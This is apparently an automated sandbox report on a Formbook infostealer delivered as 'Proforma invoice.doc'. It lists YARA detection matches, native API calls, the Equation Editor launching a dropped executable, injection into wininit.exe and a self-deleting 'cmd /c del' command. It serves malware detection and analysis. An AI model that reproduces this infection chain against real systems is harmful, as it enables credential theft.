Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_002869C9 4_2_002869C9
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00286D30 4_2_00286D30
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_002890A8 4_2_002890A8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00A46998 4_2_00A46998
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00A4936F 4_2_00A4936F
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00A401F9 4_2_00A401F9
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00A45DC8 4_2_00A45DC8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_00A45DD8 4_2_00A45DD8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 4_2_002800F0 4_2_002800F0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041D963 5_2_0041D963
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00402D8B 5_2_00402D8B
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041E5B0 5_2_0041E5B0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00409E4B 5_2_00409E4B
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00409E50 5_2_00409E50
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041EE3B 5_2_0041EE3B
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041EF5C 5_2_0041EF5C
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0086E0C6 5_2_0086E0C6
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0089D005 5_2_0089D005
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00873040 5_2_00873040
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0088905A 5_2_0088905A
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0086E2E9 5_2_0086E2E9
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00911238 5_2_00911238
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0086F3CF 5_2_0086F3CF
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008963DB 5_2_008963DB
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00872305 5_2_00872305
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00877353 5_2_00877353
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008BA37B 5_2_008BA37B
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00881489 5_2_00881489
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008A5485 5_2_008A5485
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0088C5F0 5_2_0088C5F0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0087351F 5_2_0087351F
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00874680 5_2_00874680
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0087E6C1 5_2_0087E6C1
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00912622 5_2_00912622
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008F579A 5_2_008F579A
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0087C7BC 5_2_0087C7BC
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008A57C3 5_2_008A57C3
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0090F8EE 5_2_0090F8EE
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0087C85C 5_2_0087C85C
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0089286D 5_2_0089286D
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0091098E 5_2_0091098E
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008729B2 5_2_008729B2
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008869FE 5_2_008869FE
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008F5955 5_2_008F5955
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00923A83 5_2_00923A83
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0091CBA4 5_2_0091CBA4
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0086FBD7 5_2_0086FBD7
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008FDBDA 5_2_008FDBDA
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00897B00 5_2_00897B00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02551238 7_2_02551238
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024AE2E9 7_2_024AE2E9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B7353 7_2_024B7353
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024FA37B 7_2_024FA37B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B2305 7_2_024B2305
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024AF3CF 7_2_024AF3CF
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024D63DB 7_2_024D63DB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B3040 7_2_024B3040
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024C905A 7_2_024C905A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024DD005 7_2_024DD005
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024AE0C6 7_2_024AE0C6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02552622 7_2_02552622
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024BE6C1 7_2_024BE6C1
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B4680 7_2_024B4680
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024E57C3 7_2_024E57C3
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0253579A 7_2_0253579A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024BC7BC 7_2_024BC7BC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024C1489 7_2_024C1489
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024E5485 7_2_024E5485
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B351F 7_2_024B351F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024CC5F0 7_2_024CC5F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02563A83 7_2_02563A83
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024D7B00 7_2_024D7B00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0253DBDA 7_2_0253DBDA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024AFBD7 7_2_024AFBD7
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0255CBA4 7_2_0255CBA4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024BC85C 7_2_024BC85C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024D286D 7_2_024D286D
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0254F8EE 7_2_0254F8EE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_02535955 7_2_02535955
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024C69FE 7_2_024C69FE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0255098E 7_2_0255098E
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B29B2 7_2_024B29B2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024CEE4C 7_2_024CEE4C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024E2E2F 7_2_024E2E2F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024DDF7C 7_2_024DDF7C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024C0F3F 7_2_024C0F3F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024BCD5B 7_2_024BCD5B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024E0D3B 7_2_024E0D3B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0254FDDD 7_2_0254FDDD
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FE5B0 7_2_000FE5B0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000E2D8B 7_2_000E2D8B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000E2D90 7_2_000E2D90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FEE3B 7_2_000FEE3B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000E9E4B 7_2_000E9E4B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000E9E50 7_2_000E9E50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FEF5C 7_2_000FEF5C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000E2FB0 7_2_000E2FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: String function: 008DF970 appears 69 times
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: String function: 0086E2A8 appears 31 times
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: String function: 008B373B appears 185 times
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: String function: 008B3F92 appears 72 times
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: String function: 0086DF5C appears 88 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 024F373B appears 238 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 024F3F92 appears 108 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 024AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0251F970 appears 81 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 024ADF5C appears 107 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A350 NtCreateFile, 5_2_0041A350
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A400 NtReadFile, 5_2_0041A400
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A480 NtClose, 5_2_0041A480
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A530 NtAllocateVirtualMemory, 5_2_0041A530
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A34A NtCreateFile, 5_2_0041A34A
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A3A3 NtReadFile, 5_2_0041A3A3
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A47A NtClose, 5_2_0041A47A
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041A52B NtAllocateVirtualMemory, 5_2_0041A52B
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008600C4 NtCreateFile,LdrInitializeThunk, 5_2_008600C4
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00860048
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00860078 NtResumeThread,LdrInitializeThunk, 5_2_00860078
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085F9F0 NtClose,LdrInitializeThunk, 5_2_0085F9F0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085F900 NtReadFile,LdrInitializeThunk, 5_2_0085F900
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0085FAD0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0085FAE8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0085FBB8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0085FB68
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0085FC90
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0085FC60
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0085FD8C
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0085FDC0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0085FEA0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0085FED0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0085FFB4
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008610D0 NtOpenProcessToken, 5_2_008610D0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00860060 NtQuerySection, 5_2_00860060
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008601D4 NtSetValueKey, 5_2_008601D4
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0086010C NtOpenDirectoryObject, 5_2_0086010C
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00861148 NtOpenThread, 5_2_00861148
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008607AC NtCreateMutant, 5_2_008607AC
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085F8CC NtWaitForSingleObject, 5_2_0085F8CC
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00861930 NtSetContextThread, 5_2_00861930
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085F938 NtWriteFile, 5_2_0085F938
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FAB8 NtQueryValueKey, 5_2_0085FAB8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FA20 NtQueryInformationFile, 5_2_0085FA20
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FA50 NtEnumerateValueKey, 5_2_0085FA50
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FBE8 NtQueryVirtualMemory, 5_2_0085FBE8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0085FB50 NtCreateKey, 5_2_0085FB50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A00C4 NtCreateFile,LdrInitializeThunk, 7_2_024A00C4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A07AC NtCreateMutant,LdrInitializeThunk, 7_2_024A07AC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0249FAD0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0249FAE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0249FAB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FB50 NtCreateKey,LdrInitializeThunk, 7_2_0249FB50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0249FB68
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0249FBB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249F900 NtReadFile,LdrInitializeThunk, 7_2_0249F900
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249F9F0 NtClose,LdrInitializeThunk, 7_2_0249F9F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0249FED0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0249FFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0249FC60
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0249FDC0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A0048 NtProtectVirtualMemory, 7_2_024A0048
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A0060 NtQuerySection, 7_2_024A0060
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A0078 NtResumeThread, 7_2_024A0078
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A10D0 NtOpenProcessToken, 7_2_024A10D0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A1148 NtOpenThread, 7_2_024A1148
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A010C NtOpenDirectoryObject, 7_2_024A010C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A01D4 NtSetValueKey, 7_2_024A01D4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FA50 NtEnumerateValueKey, 7_2_0249FA50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FA20 NtQueryInformationFile, 7_2_0249FA20
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FBE8 NtQueryVirtualMemory, 7_2_0249FBE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249F8CC NtWaitForSingleObject, 7_2_0249F8CC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249F938 NtWriteFile, 7_2_0249F938
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A1930 NtSetContextThread, 7_2_024A1930
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FE24 NtWriteVirtualMemory, 7_2_0249FE24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FEA0 NtReadVirtualMemory, 7_2_0249FEA0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FF34 NtQueueApcThread, 7_2_0249FF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FFFC NtCreateProcessEx, 7_2_0249FFFC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FC48 NtSetInformationFile, 7_2_0249FC48
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A0C40 NtGetContextThread, 7_2_024A0C40
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FC30 NtOpenProcess, 7_2_0249FC30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FC90 NtUnmapViewOfSection, 7_2_0249FC90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FD5C NtEnumerateKey, 7_2_0249FD5C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_0249FD8C NtDelayExecution, 7_2_0249FD8C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024A1D80 NtSuspendThread, 7_2_024A1D80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA350 NtCreateFile, 7_2_000FA350
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA400 NtReadFile, 7_2_000FA400
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA480 NtClose, 7_2_000FA480
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA530 NtAllocateVirtualMemory, 7_2_000FA530
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA34A NtCreateFile, 7_2_000FA34A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA3A3 NtReadFile, 7_2_000FA3A3
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA47A NtClose, 7_2_000FA47A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FA52B NtAllocateVirtualMemory, 7_2_000FA52B
PE file contains strange resources
Source: ibefrankzx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibefrankhq4862.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Proforma invoice.doc ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe' Jump to behavior
